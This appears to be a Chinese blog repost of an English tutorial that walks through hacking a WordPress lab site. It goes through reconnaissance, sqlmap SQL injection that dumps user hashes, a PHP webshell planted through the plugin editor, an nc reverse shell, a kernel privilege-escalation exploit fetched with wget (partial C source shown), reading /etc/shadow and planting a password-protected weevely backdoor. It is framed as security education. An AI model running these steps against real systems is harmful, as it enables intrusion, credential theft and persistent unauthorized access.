zoukankan      html  css  js  c++  java
  • 从信息收集到提权(渗透测试基础总结)

    假设黑客要入侵的你的网站域名为:hack-test.com

    让我们用ping命令获取网站服务器的IP地址.

    现在我们获取了网站服务器的IP地址为:173.236.138.113

    寻找同一服务器上的其它网站,我们使用sameip.org.

    26 sites hosted on IP Address 173.236.138.113

    ID

    Domain

    Site Link

    1

    hijackthisforum.com

    hijackthisforum.com

    2

    sportforum.net

    sportforum.net

    3

    freeonlinesudoku.net

    freeonlinesudoku.net

    4

    cosplayhell.com

    cosplayhell.com

    5

    videogamenews.org

    videogamenews.org

    6

    gametour.com

    gametour.com

    7

    qualitypetsitting.net

    qualitypetsitting.net

    8

    brendanichols.com

    brendanichols.com

    9

    8ez.com

    8ez.com

    10

    hack-test.com

    hack-test.com

    11

    kisax.com

    kisax.com

    12

    paisans.com

    paisans.com

    13

    mghz.com

    mghz.com

    14

    debateful.com

    debateful.com

    15

    jazzygoodtimes.com

    jazzygoodtimes.com

    16

    fruny.com

    fruny.com

    17

    vbum.com

    vbum.com

    18

    wuckie.com

    wuckie.com

    19

    force5inc.com

    force5inc.com

    20

    virushero.com

    virushero.com

    21

    twincitiesbusinesspeernetwork.com

    twincitiesbusinesspeernetwork.com

    22

    jennieko.com

    jennieko.com

    23

    davereedy.com

    davereedy.com

    24

    joygarrido.com

    joygarrido.com

    25

    prismapp.com

    prismapp.com

    26

    utiligolf.com

    utiligolf.com

    173.236.138.113上有26个网站,很多黑客为了攻破你的网站可能会检查同服务器上的其它网站,但是本次是以研究为目标,我们将抛开服务器上的其它网站,只针对你的网站来进行入侵检测。

    We’ll need more information about your site, such as:

    我们需要关于你网站的以下信息:

    1. DNS records (A, NS, TXT, MX and SOA)
    2. Web Server Type (Apache, IIS, Tomcat)
    3. Registrar (the company that owns your domain)
    4. Your name, address, email and phone
    5. Scripts that your site uses (php, asp, asp.net, jsp, cfm)
    6. Your server OS (Unix,Linux,Windows,Solaris)
    7. Your server open ports to internet (80, 443, 21, etc.)

    让我们开始找你网站的DNS记录,我们用who.is来完成这一目标.

    我们发现你的DNS记录如下

    让我们来确定web服务器的类型

    发现你的W eb服务器是apache,接下来确定它的版本.

    HACK-TEST.COM SITE INFORMATION

    IP: 173.236.138.113
    Website Status: active
    Server Type: Apache
    Alexa Trend/Rank:  1 Month: 3,213,968 3 Month: 2,161,753
    Page Views per Visit:  1 Month: 2.0 3 Month: 3.7

    接下来是时候寻找你网站域名的注册信息,你的电话、邮箱、地址等.

    我们现在已经获取了你的网站域名的注册信息,包括你的重要信息等.我们可以通过backtrack 5中的whatweb来获取你的网站服务器操作系统类型和服务器的版本.

    我们发现你的网站使用了著名的php整站程序wordpress,服务器的的系统类型为Fedora LinuxWeb服务器版本Apache 2.2.15.继续查看网站服务器开放的端口,用渗透测试工具nmap:

    1-Find services that run on server(查看服务器上运行的服务)


    2-Find server OS(查看操作系统版本)


    只有80端口是开放的,操作系统是Linux2.6.22Fedora Core 6),现在我们已经收集了所有关于你网站的重要信息, 接下来开始扫描寻找漏洞,比如:

    Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF 等等.

    我们将使用Nikto来收集漏洞信息:

    root@bt:/pentest/web/nikto# perl nikto.pl -h hack-test.com


    我们也会用到Backtrack 5 R1中的W3AF 工具:

    root@bt:/pentest/web/w3af# ./w3af_gui

    我们输入要检测的网站地址,选择完整的安全审计选项.

    稍等一会,你将会看到扫描结果.

    发现你的网站存在sql注入漏洞、XSS漏洞、以及其它的漏洞.让我们来探讨SQL注入漏洞.

    http://hack-test.com/Hackademic_RTB1/?cat=d27z220

    我们通过工具发现这个URL存在SQL注入,我们通过Sqlmap来检测这个url.

    Using sqlmap with –u url

    过一会你会看到

    输入N按回车键继续

    我们发现你的网站存在mysql显错注入,mysql数据库版本是5.0. 我们通过加入参数”-dbs”来尝试采集数据库名.

    发现三个数据库,接下来通过参数”-D wordpress -tables”来查看wordpress数据库的所有表名

    通过参数“-T wp_users –columns ”来查看wp_users表中的字段.

    接下来猜解字段user_loginuser_pass的值.用参数”-C user_login,user_pass –dump”

    我们会发现用户名和密码hashes. 我们需要通过以下在线破解网站来破解密码hashes

    http://www.onlinehashcrack.com/free-hash-reverse.php

    登陆wordpress的后台wp-admin

    尝试上传php webshell到服务器,以方便运行一些linux命令.在插件页面寻找任何可以编辑的插件. 我们选择Textile这款插件,编辑插入我们的php webshell,点击更新文件,然后访问我们的php webshell.

    Php webshell被解析了,我们可以控制你网站的文件,但是我们只希望获得网站服务器的root权限,来入侵服务器上其它的网站。

    我们用NC来反弹一个shell,首先在我们的电脑上监听5555端口.

    然后在Php webshell上反向连接我们的电脑,输入你的IP和端口5555.

    点击连接我们会看到

    接下来我们尝试执行一些命令:

    id

    uid=48(apache) gid=489(apache) groups=489(apache)
    (用来显示用户的id和组)

    pwd

    /var/www/html/Hackademic_RTB1/wp-content/plugins
    (显示服务器上当前的路径)

    uname -a

    Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
    (显示内核版本信息)

    现在我们知道,服务器的内核版本是2.6.31.5-127.fc12.1686,我们在exploit-db.com中搜索此版本的相关漏洞.
    在服务器上测试了很多exp之后,我们用以下的exp来提升权限.
    http://www.exploit-db.com/exploits/15285

    我们在nc shell上执行以下命令:
    wget http://www.exploit-db.com/exploits/15285 -o roro.c
    (下载exp到服务器并重命名为roro.c)
    注:很多linux内核的exp都是C语言开发的,因此我们保存为.c扩展名.
    exp roro.c代码如下:

    #include <stdio.h>
    #include <unistd.h>
    #include <stdlib.h>
    #include <fcntl.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <errno.h>
    #include <string.h>
    #include <sys/ptrace.h>
    #include <sys/utsname.h>
    #define RECVPORT 5555
    #define SENDPORT 6666
    int prep_sock(int port)
    {
    int s, ret;
    struct sockaddr_in addr;
    s = socket(PF_RDS, SOCK_SEQPACKET, 0);
    if(s < 0)
    {
    printf(“[*] Could not open socket. ”);
    exit(-1);
    }
    memset(&addr, 0, sizeof(addr));
    通过以上代码我们发现该expC语言开发的,我们需要将他编译成elf格式的,命令如下:

    gcc roro.c –o roro

    接下来执行编译好的exp

    ./roro


    执行完成之后我们输入id命令

    id

    我们发现我们已经是root权限了

    uid=0(root) gid=0(root)


    现在我们可以查看/etc/shadow文件
    cat /etc/shadow

    查看/etc/passwd 文件

    cat /etc/passwd

    我们可以使用”john the ripper”工具破解所有用户的密码.但是我们不会这样做,我们需要在这个服务器上留下后门以方便我们在任何时候访问它.

    我们用weevely制作一个php小马上传到服务器上.

    1.weevely使用选项
    root@bt:/pentest/backdoors/web/weevely# ./main.py -

    2.weevely创建一个密码为kokophp后门

    root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p koko

    接下来上传到服务器之后来使用它
    root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u http://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -p koko


    测试我们的hax.php后门

    总结:

    在这边文章中我们学到的一些技术正被黑客用来入侵你的网站和服务器,我们希望能通过这篇文章能够对你未来维护服务器和网站安全有所帮助.

    本文只是用来学习了解Web安全的相关知识,原文链接:

    http://resources.infosecinstitute.com/hacking-a-wordpress-site/

  • 相关阅读:
    XSS跨站脚本攻击实例讲解,新浪微博XSS漏洞过程分析
    PHP常量PHP_SAPI与函数php_sapi_name()简介,PHP运行环境检测
    PHP导出数据到CSV文件函数/方法
    iOS8 Core Image In Swift:视频实时滤镜
    实战:mysql版本号升级
    Apache Shiro 使用手冊 链接文件夹整理
    Windows 驱动开发
    Python标准库:内置函数bytearray([source[, encoding[, errors]]])
    cocos2d-x 2.2.3 之菜单分析(1)
    JSP具体篇——out
  • 原文地址:https://www.cnblogs.com/MiWhite/p/7089384.html
Copyright © 2011-2022 走看看